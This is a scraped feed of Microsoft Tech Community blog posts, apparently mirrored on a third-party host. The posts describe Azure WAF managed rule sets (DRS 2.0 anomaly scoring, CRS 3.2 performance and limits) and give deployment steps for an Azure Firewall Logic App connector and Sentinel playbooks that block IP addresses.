It has a binary "match-or-not-match" approach.&nbsp;This mode is easy to understand, but it&nbsp;lacks&nbsp;information about how many rules&nbsp;a&nbsp;specific&nbsp;HTTP&nbsp;request&nbsp;would match.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">In DRS 2.0, the&nbsp;Azure WAF runs in “Anomaly Scoring Mode”.&nbsp;This means that&nbsp;an HTTP request gets inspected by all rules in the rule set,&nbsp;each rule has a specific severity level,&nbsp;and&nbsp;points&nbsp;are assigned based on the criticality of each rule.&nbsp;The&nbsp;WAF adds up&nbsp;these points, and if they reach the anomaly scoring threshold, then&nbsp;the WAF takes the configured action (block, log, or redirect).&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">Anomaly Scoring Mode allows&nbsp;analysts and administrators to get a holistic view of the attack, as the WAF will log&nbsp;all&nbsp;matches for a single&nbsp;HTTP&nbsp;request. 
It also&nbsp;helps lower the rate of false positives because it blocks requests based on severity levels and anomaly thresholds, instead of a simpler binary approach.&nbsp;</FONT></P> <P class="lia-indent-padding-left-330px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_3-1628536692438.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301879i205945AF340A04CD/image-size/medium?v=v2&amp;px=400" role="button" title="camilamartins_3-1628536692438.png" alt="camilamartins_3-1628536692438.png" /></span></FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Additional Content-Type&nbsp;Support&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">DRS 2.0&nbsp;supports&nbsp;additional Content-Types&nbsp;for HTTP request body inspection. Azure WAF&nbsp;for Front Door&nbsp;can inspect&nbsp;HTTP request body&nbsp;sizes&nbsp;up to&nbsp;128KB. 
If requests are&nbsp;larger than 128KB, the&nbsp;WAF will stop inspection at that limit&nbsp;mark.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">The supported Content-Types&nbsp;when using&nbsp;the DRS 2.0 managed rule set are:&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <UL> <LI class="lia-indent-padding-left-30px"><FONT size="4">application/json&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">application/xml&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">application/x-www-form-urlencoded&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">multipart/form-data&nbsp;</FONT></LI> </UL> Wed, 11 Aug 2021 16:32:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-managed-rule-set-on-azure-waf-for-front-door-premium/ba-p/2628959 camilamartins 2021-08-11T16:32:18Z New Improvements on Azure WAF for Application Gateway https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-improvements-on-azure-waf-for-application-gateway/ba-p/2572257 <P>A new managed rule set called <STRONG><EM>OWASP_3.2</EM></STRONG> has been launched in public preview on Azure WAF for Application Gateway. This rule set is based on OWASP ModSecurity Core Rule Set (CRS), which intends to protect web applications from the most common attacks, such as the OWASP Top 10. 
We often refer to the <STRONG><EM>OWASP_3.2</EM></STRONG> rule set interchangeably with <STRONG><EM>CRS 3.2</EM></STRONG>.</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What are the requirements to use CRS 3.2?</STRONG></FONT></P> <P>You must be using Azure Application Gateway WAF_v2 SKU, and you must be using WAF Policy to manage your Azure WAF settings.</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What changes when enabling CRS 3.2?</STRONG></FONT></P> <P>With the new WAF engine, you will receive the following benefits:</P> <P>&nbsp;</P> <P><FONT size="4" color="#333399"><STRONG>Reduced false positives and added security rules</STRONG></FONT></P> <P>CRS 3.2 has several improvements in comparison to the previous CRS versions. Multiple security rules have received fixes that help lower the occurrence of false positives, and new security rules have been added to detect and protect against more threats, such as attacks against JAVA applications. For more detailed information on what changed from CRS 3.1 to CRS 3.2, you can refer to the <A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set Version 3.2.0 change log</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_0-1626892666368.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297464i938EB678DCBC7513/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_0-1626892666368.png" alt="camilamartins_0-1626892666368.png" /></span></P> <P>&nbsp;</P> <P><FONT size="4"><STRONG><FONT color="#333399">Better performance</FONT>&nbsp;</STRONG></FONT></P> <P>The new WAF engine has been designed to allow for more flexibility, reliability, and efficiency. 
This engine offers improved memory utilization, latency, and throughput – which contributes to overall better performance when using Azure WAF for Application Gateway v2.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>As an example, we compared the latency rates between the new WAF engine, old WAF engine, and Application Gateway v2 with no WAF enabled. Keep in mind that the examples below are findings from internal test samples, and actual performance improvement rates for customers’ resources may vary.</P> <P>&nbsp;</P> <P>In the sample test below, we verified the amount of latency based on a GET request with different cookie sizes. We can see in the chart below how a request with a cookie size of 4kb with the old WAF engine resulted in a latency of above 100 milliseconds, while the latency for the same cookie size with the new WAF engine is below 50 milliseconds. The performance improvement gets even more significant when comparing to a larger cookie size, as seen with the 16kb cookie.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_1-1626892708699.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297465i212034C48ACB99A7/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_1-1626892708699.png" alt="camilamartins_1-1626892708699.png" /></span></P> <P>&nbsp;</P> <P><SPAN>In another sample test, we measured&nbsp;the amount of&nbsp;latency based on a POST request with different payload sizes. 
We can see in the chart&nbsp;below&nbsp;that a payload of 128kb in size has an expected latency of just above 500 milliseconds with the new WAF engine, while the same payload size reaches almost 2500 milliseconds of latency with the previous WAF engine.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_2-1626892721090.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297466i734D5503CB6D0200/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_2-1626892721090.png" alt="camilamartins_2-1626892721090.png" /></span></P> <P><FONT size="4" color="#333399"><STRONG>Increased limits</STRONG></FONT></P> <P>Due to improvements in our new WAF engine in the backend,&nbsp;we now allow customers to increase the limits for <EM>Max Request Body Size</EM> and <EM>Max File Upload Size</EM>. The <STRONG><EM>Max Request Body Size</EM></STRONG> limit was increased <STRONG>from 128KB to 2MB</STRONG>, and the <STRONG><EM>Max File Upload Size</EM></STRONG> limit was increased <STRONG>from 750MB to 4GB.</STRONG></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_3-1626892732228.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297467i19CC04DF45643EC2/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_3-1626892732228.png" alt="camilamartins_3-1626892732228.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 21 Jul 2021 21:25:12 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-improvements-on-azure-waf-for-application-gateway/ba-p/2572257 camilamartins 2021-07-21T21:25:12Z Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks 
https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224 <P>&nbsp;</P> <P><SPAN>Written in partnership with&nbsp;<LI-USER uid="548441"></LI-USER>&nbsp;</SPAN><SPAN>(Program Manager,&nbsp;</SPAN><SPAN>Azure Sentinel Product Team)</SPAN></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="6">Introduction</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">In the <A href="#" target="_blank" rel="noopener">current threat landscape</A>, success of security operations depends on the ability to respond quickly to threats in the environment.&nbsp; A key part of the agility needed to respond to the volume of threats detected by many systems is automation in both detection and response processes.&nbsp; <SPAN>To implement security monitoring, detection,&nbsp;and response at scale from a networking&nbsp;perspective, in addition to having visibility into the traffic traversing through your network devices&nbsp;and detection logic&nbsp;to&nbsp;identify malicious patterns&nbsp;in the network traffic, you also need automation to surface threats to SOCs/security analysts and allow them to take swift response/remediation actions to mitigate the threats.</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN>Readers of this post will hopefully be familiar with both Azure&nbsp;Firewall,&nbsp;which provides protection against&nbsp;network-based&nbsp;threats,&nbsp;and Azure&nbsp;Sentinel,&nbsp;which provides&nbsp;SIEM (</SPAN><SPAN>Security Information and Event Management</SPAN><SPAN>) and SOAR (security&nbsp;orchestration,&nbsp;automation, and&nbsp;response)&nbsp;capabilities.&nbsp;&nbsp;In this blog, we will&nbsp;discuss&nbsp;the&nbsp;new </SPAN>Azure Firewall Logic App Connector and Playbook Templates<SPAN> which provide deeper integration for&nbsp;Azure Firewall&nbsp;with&nbsp;Azure Sentinel.&nbsp;&nbsp;With this integration, you can automate response to Azure Sentinel incidents that contain IP 
addresses (IP entity), in Azure Firewall. &nbsp;The&nbsp;new Connector and Playbook templates allow&nbsp;security teams to&nbsp;get&nbsp;threat detection alerts&nbsp;directly in a Microsoft Teams Channel when one of the Playbooks attached to an Automation Rule triggers based on a Sentinel detection rule.&nbsp; Security&nbsp;incident&nbsp;response&nbsp;teams can&nbsp;then&nbsp;triage, perform&nbsp;one click response and&nbsp;remediation in Azure Firewall to block or allow IP address sources and destinations based on these alerts.</SPAN><SPAN>&nbsp;</SPAN></FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Scenario</FONT></H2> <H2>&nbsp;</H2> <P data-unlink="true"><FONT size="4">In case of an attack or a compromise, a malicious adversary or malware may employ a variety of techniques to discover, infiltrate into and exfiltrate data from a target environment.&nbsp; <SPAN>The traffic representing these malicious activities will flow in and out through the network ingress and egress points where it will be processed and logged, ideally by a&nbsp;firewall&nbsp;controlling internet access.&nbsp; The data logged by firewalls processing internet egress traffic can be analyzed to detect traffic patterns suggesting/representing malicious activity.&nbsp; </SPAN>Azure Sentinel provides many such <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">in-built rules to detect malicious traffic patterns through Azure Firewall logs</A><SPAN>.&nbsp; &nbsp;&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4">The new Azure Firewall Connector and Playbooks can be added on to this workflow, whereby the Automation feature in Azure Sentinel can be used to trigger one of the Firewall Playbooks when an incident with an IP entity is created (by an Analytic rule-based detection), to take desired action.&nbsp; When the Azure Sentinel detection rule 
criteria is met, the attached Playbook is triggered which sends an adaptive notification to a Teams Channel defined in the configuration.&nbsp; The adaptive notification allows the SOC team to triage the notification and either act on the alert by blocking specific IP sources or destinations or to ignore the detection as false positive, as defined in the Playbook.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">What’s New</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">Up until now, customers could create their own Logic App Connector for Azure Firewall and Playbooks.&nbsp; We are excited to announce availability of the <A href="#" target="_blank" rel="noopener">Custom Logic App Connector along with three new Playbooks Templates for Azure Firewall</A> which can be used with Azure Sentinel Automation feature and Analytic Rules to take a variety of desired actions, in case of a detection.&nbsp; The solution package contains four components:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4"><STRONG>Azure Firewall Connector</STRONG>:&nbsp; The connector allows you to take many different actions against Azure Firewall, Firewall Policy, and IP Groups.&nbsp; A full list of actions supported by the connector is available <A href="#" target="_blank" rel="noopener">here</A></FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG>: &nbsp;This playbook allows you to block IP addresses in Azure Firewall by adding them to <STRONG>IP Groups </STRONG>based on analyst decision. &nbsp;It allows you to make changes on IP Groups, which are attached to firewall rules, instead of making changes directly to the Azure Firewall. 
&nbsp;The target IP Group could be associated with policy/rules used in one or more firewalls</FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG>:&nbsp; This playbook allows the SOC to automatically respond to Azure Sentinel incidents that include a destination IP address, by adding the specific IP to the Threat Intelligence (TI) Allow list in Azure Firewall</FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG>:&nbsp; This playbook allows you to block an IP address by adding a new network rule with the specific IP to an existing Deny Network Rule Collection in Azure Firewall</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">All three playbooks add VirusTotal enrichment and send an adaptive notification to the specified Teams Channel.&nbsp; Whether you’re using Azure Firewall Standard with Classic Rules, Firewall Manager Standard Policies or Firewall Premium with Firewall Manager Premium Policies, the different playbook templates provide coverage for these different configuration scenarios.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4">The table below summarizes playbook support for the Firewall Standard and Premium policy types:</FONT></P> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD> <P><FONT size="4"><STRONG>Playbook Name</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Premium Policy</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Standard Policy</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Classic Rules</STRONG></FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT 
size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> </TR> </TBODY> </TABLE> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">How Azure Firewall Logic App Connector and Playbooks Work</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">The steps below provide an overview of the end-to-end Playbook and Connector workflow:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">A new Azure Sentinel incident is created with an IP entity which triggers one of the three playbooks attached to the Automation Rule</FONT></LI> <LI><FONT size="4">An adaptive card is sent to the SOC Teams channel providing IP address, VirusTotal report, showing list of existing firewalls in the Resource group and depending on the playbook in use, providing an option to add the specific source or destination IP address to an <STRONG>IP Group</STRONG>, <STRONG>TI Allow List</STRONG>, <STRONG>a new rule to be added to an existing Deny Network Rule Collection.&nbsp; </STRONG>The analyst can also choose to either close the incident using one of the classifications provided in the adaptive card, change the incident severity or to completely ignore the incident</FONT> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Teams Adaptive Notification Card.jpg" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286124iB046CC8BFD79EFD7/image-size/medium?v=v2&amp;px=400" role="button" title="Teams Adaptive Notification Card.jpg" alt="Teams Adaptive Notification Card" /><span class="lia-inline-image-caption" 
onclick="event.preventDefault();">Teams Adaptive Notification Card</span></span></P> </LI> <LI><FONT size="4">If the SOC analyst decides to act on the incident by clicking the action button depending on the playbook in use (<STRONG style="font-family: inherit;">Add this IP Address to the IP Group</STRONG><SPAN style="font-family: inherit;">,</SPAN><STRONG style="font-family: inherit;"> Add IP address to threat intel allow list </STRONG><SPAN style="font-family: inherit;">or</SPAN><STRONG style="font-family: inherit;"> Add IP address to Network Rules Collection </STRONG><SPAN style="font-family: inherit;">buttons), the Firewall Connector uses the Service Principal to authenticate against and make changes to the respective targets: IP Group, Threat Intel Allow List, or the Network Rule Collection.&nbsp; Additionally, the incident gets updated with endpoint information, a summary of the action taken, and the VirusTotal scan report</SPAN></FONT></LI> <LI><FONT size="4">If ignored, the incident gets updated with endpoint information and a summary of the action taken</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">All three playbooks work in a similar fashion, the only difference being the action performed by the specific playbook.&nbsp;&nbsp;</FONT><FONT size="4">To learn more about the end-to-end workflow of each workbook, please visit the Azure Sentinel GitHub repo page for Azure Firewall <A href="#" target="_blank" rel="noopener">here</A>.&nbsp; You can click on the Connector and Playbook links to get more details.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">What Customizations Can be Done</FONT></H2> <P>&nbsp;</P> <P><FONT size="4">You can also customize the playbook templates to your preference.&nbsp; Existing playbook logic can be modified or removed, and new logic can be added to the playbooks to meet your specific requirements.&nbsp; Below are a couple of examples of the customization that can be made:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT 
size="4">You can replace the VirusTotal TI with your own custom TI provider</FONT></LI> <LI><FONT size="4">You can remove the Teams notification steps in the playbook to remove any human decision/intervention and allow a playbook to make changes directly in the Firewall</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">It is important to note that the playbook templates and examples above are merely a source of reference and inspiration.&nbsp; While you can choose to use the available playbook templates as is, you can also customize them heavily to the extent needed.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">How to Deploy</FONT></H2> <P>&nbsp;</P> <P><FONT size="4">The Azure Firewall Logic App Connector and Playbooks can be deployed directly from the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repo page</A> by clicking the <A href="#" target="_blank" rel="noopener">Deploy to Azure</A> button.</FONT></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><STRONG><EM>Notes</EM></STRONG><EM>: </EM></FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4"><EM>The Azure Firewall Logic App Connector and Playbooks are also available in the <STRONG>Azure Firewall Solution for Azure Sentinel</STRONG></EM></FONT></LI> <LI><FONT size="4"><EM>The Azure Firewall Solution for Azure Sentinel is available and can be deployed from the Azure Marketplace (search for “Azure Firewall Solution”) or from the Solution (Preview) gallery in Azure Sentinel</EM></FONT></LI> <LI><FONT size="4"><EM>The Azure Sentinel Solution gallery is currently in preview and available via the Azure Sentinel blade in the left pane under the Configuration node</EM></FONT></LI> </OL> </LI> </UL> <P>&nbsp;</P> <P><FONT size="4">In this post, we will discuss how to deploy from the Azure Sentinel GitHub repo.&nbsp; We will discuss the Azure Firewall Solution for Azure Sentinel in a separate post.</FONT></P> <P>&nbsp;</P> 
<P><STRONG><FONT size="4">Please review the deployment prerequisites (pre-deployment configuration) and the post-deployment steps below to successfully deploy, configure, and start using the automation.</FONT></STRONG></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="5">Deployment Prerequisites</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">You must have an existing Azure Firewall Standard or Azure Firewall Premium, Firewall Policy and IP Group deployed in the environment. &nbsp;The following dependencies should be understood, and prerequisites must be completed before you begin deploying the Firewall Connector and Playbooks.&nbsp; You should have the required permissions to make these changes.</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">The Firewall Connector uses an Azure AD application and service principal to authenticate and make changes to the Firewall, Firewall Policy, and IP Group configuration when a Playbook is triggered.&nbsp; To enable this, you must complete the following steps&nbsp;</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Register an application with Azure AD and create a Service Principal using these instructions <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">Create an Azure AD app &amp; service principal in the portal</A></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">You will use this application credential when deploying the Firewall Connector and Playbooks.&nbsp; To retrieve it, go to the<SPAN>&nbsp;<STRONG>Azure Active Directory --&gt;</STRONG>&nbsp;<STRONG>App registrations</STRONG> </SPAN>blade and find the following</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">Tenant Id (Directory ID in Overview blade)</FONT></LI> <LI><FONT size="4">Client ID (Application ID in Overview blade)</FONT></LI> <LI><FONT size="4">Client secret (Client secret Value in Certificates &amp; secrets blade)</FONT><span 
class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Get AAD Secret.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286131i981933075D9B00EC/image-size/large?v=v2&amp;px=999" role="button" title="Get AAD Secret.jpg" alt="Get AAD Secret" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Get AAD Secret</span></span></LI> </UL> </LI> </UL> </LI> <LI><FONT size="4">Assign the Azure AD application and service principal “Contributor” permission to the Azure Firewall, Firewall Policy, and IP Groups.&nbsp; Use the IAM panel of these resources to assign the permission</FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">For each Firewall, Firewall Policy, and IP Group resource that you want to be updated when a Playbook is triggered</FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4">Go to Settings --&gt; <STRONG>Access control (IAM)</STRONG></FONT></LI> <LI><FONT size="4">Click <STRONG>Add </STRONG>and then click<STRONG> Add role assignment</STRONG></FONT></LI> <LI><FONT size="4">Select <STRONG>Contributor</STRONG> role</FONT></LI> <LI><FONT size="4">Search for the name of your Azure AD application and service principal created in the previous step (1a), select it, and then click <STRONG>Save</STRONG></FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG>Note</STRONG>:</EM> <EM>By default, Azure AD applications aren't displayed in the available options. 
To find your application, search for the name and select it</EM></FONT></LI> </UL> </LI> </OL> </LI> </UL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="2"> <LI><FONT size="4">When a Playbook is triggered, it first posts an adaptive notification action card to the Teams Channel you specify in the configuration.&nbsp; This allows the SOC analyst to take desired action directly from Teams using the options available in the adaptive card.&nbsp; To enable this, you must complete the following steps</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Create a Team and a Channel in Microsoft Teams (if it does not exist)</FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">Instructions:&nbsp; <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">Create a team from scratch - Office Support</A></FONT></LI> </UL> </LI> <LI><FONT size="4">You will need the Teams and Channel id when deploying <SPAN style="font-family: inherit;">Firewall Connector and Playbooks.&nbsp; To o</SPAN><SPAN style="font-family: inherit;">btain Teams id and Channel id, please follow the below instructions</SPAN></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">Copy the URL of the Teams Channel where you would like to get Playbook notifications</FONT></LI> <LI><FONT size="4">Click on the ellipses next to the Teams Channel and click <STRONG style="font-family: inherit;">Get link to the channel</STRONG></FONT></LI> </UL> </LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-120px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="GetTeamsURL.png" style="width: 166px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286118i2AA0EBF4FB650408/image-size/large?v=v2&amp;px=999" role="button" title="GetTeamsURL.png" alt="Get Teams URL" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Get Teams URL</span></span></P> <OL start="2"> <LI 
style="list-style-type: none;"> <OL class="lia-list-style-type-lower-alpha"> <LI style="list-style-type: none;"> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">The URL will be in the following format -&nbsp;<EM style="font-family: inherit;"><A href="#" target="_blank" rel="noopener">https://teams.microsoft.com/l/channel/</A></EM><FONT style="font-family: inherit;" color="#FF6600"><EM>10</EM><FONT color="#0000FF"><EM>%3a</EM></FONT><EM>3xxxxx3302eaxxxxx790xxxxxx21xx78</EM><FONT color="#0000FF"><EM>%40</EM></FONT><EM>thread.skype</EM></FONT><EM style="font-family: inherit;">/General?groupId=</EM><FONT style="font-family: inherit;" color="#FF6600"><EM>axxx61xx-2xx8-xx45-a0xx-53xx476xxx0x</EM></FONT><EM style="font-family: inherit;">&amp;tenantId=1xxxx7xx-1xxb-3xx9-xx8b-87xxxxx1xx60</EM></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">The Teams Group id is in the <STRONG><EM>groupId=</EM></STRONG> parameter in the URL</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">From above example, Teams Group id: axxx61xx-2xx8-xx45-a0xx-53xx476xxx0x</FONT></LI> </UL> </LI> <LI><FONT size="4">The Teams Channel id is in the URI after <EM><STRONG>/channel/</STRONG> </EM>in the URL.&nbsp; You will need to replace the parts marked in blue, in the URL with " : " and " @ " to get a valid Channel id</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">&nbsp;From above example, Teams Channel id: <FONT color="#FF6600">10<FONT color="#0000FF">:</FONT>3xxxxx3302eaxxxxx790xxxxxx21xx78<FONT color="#0000FF">@</FONT>thread.skype</FONT></FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG style="font-family: inherit;">Notes</STRONG><SPAN style="font-family: inherit;">:</SPAN></EM></FONT><BR /> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4"><EM>You can also skip the </EM><EM>Teams Group id and Teams Channel id during the initial deployment by adding N/A to the fields and configure them directly in 
all three playbooks using the drop-down menu after deploying and authorizing the Teams APIs successfully (see post deployment steps for more details on authorizing the APIs)</EM></FONT></LI> <LI><FONT size="4"><EM style="font-family: inherit;">You can also get Teams Channel id using the Microsoft Teams PowerShell module with these instructions </EM><A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener"><EM>Get-TeamChannel</EM></A></FONT></LI> </OL> </LI> </UL> </LI> </UL> </LI> </UL> </LI> </UL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="3"> <LI><FONT size="4">The Playbooks leverage the VirusTotal service for notification enrichment with IP details and reputation. &nbsp;To use these VirusTotal capabilities, you will need to generate a VirusTotal API key</FONT><FONT size="4">&nbsp;</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Create a VirusTotal API key using this link <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">how to generate the API Key</A></FONT></LI> <LI><FONT size="4">You will use the API key to authorize the VirusTotal APIs in the post deployment steps below</FONT></LI> </OL> </LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="5">Deploying the Firewall Connector and Playbooks</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">After completing the deployment prerequisites, you are now ready to deploy the Firewall Connector and Playbooks.&nbsp; To deploy, please use the following instructions</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Browse over to the Azure Sentinel GitHub repo page and click the <A href="#" target="_blank" rel="noopener">Deploy to Azure</A> button</FONT></LI> <LI><FONT size="4">In the <STRONG>Custom deployment</STRONG> page, select the Subscription and Resource Group where you want to deploy the components</FONT></LI> <LI><FONT size="4">Add the Teams; Group id and Channel id along with Service Principal; 
Client id and Client Secret</FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG>Note</STRONG>: You can also skip the Teams Group id and Teams Channel id during the initial deployment by adding N/A (or some other text) to the fields and configure them directly in all three playbooks using the drop-down menu after deploying and authorizing the Teams APIs successfully (see post deployment steps for more details on authorizing the APIs)</EM></FONT></LI> </UL> </LI> <LI><FONT size="4">Click <STRONG>Review + Create</STRONG> button and then click the <STRONG>Create</STRONG> button on next page to start deployment</FONT></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="SentinelSolutionDeploy_Trimmed.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286126i05F11D8B2C5EDD03/image-size/large?v=v2&amp;px=999" role="button" title="SentinelSolutionDeploy_Trimmed.gif" alt="Deploying Firewall Connector and Playbooks" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Firewall Connector and Playbooks</span></span></P> <H2>&nbsp;</H2> <H3>&nbsp;</H3> <H2><FONT size="5">Post Deployment Configuration and Validation</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">After the deployment of Firewall Connector and Playbooks is complete, you should see a total of sixteen new resources in the target Resource Group.&nbsp; The new resources will include a Logic App Connector for Firewall, three Logic App Playbooks, and twelve API connections (three APIs each for OAuth, VirusTotal, Azure Sentinel, and Teams).&nbsp; Please follow the below steps before the Playbooks can be used.</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Authorize API Connections:&nbsp; All APIs for the solution must be authorized before the connector and playbooks can be used.&nbsp; Please complete the following steps 
